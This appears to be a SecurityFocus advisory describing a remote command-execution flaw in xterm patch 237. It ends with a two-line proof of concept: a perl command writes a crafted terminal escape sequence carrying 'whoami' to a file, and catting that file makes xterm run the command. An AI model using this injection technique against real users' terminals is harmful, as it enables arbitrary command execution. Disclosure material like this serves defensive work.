12 lines
No EOL
515 B
Text
12 lines
No EOL
515 B
Text
source: https://www.securityfocus.com/bid/33060/info
|
|
|
|
The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.
|
|
|
|
Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.
|
|
|
|
The issue affects xterm with patch 237; other versions may also be affected.
|
|
|
|
The following example is available:
|
|
|
|
perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
|
|
cat bla.log |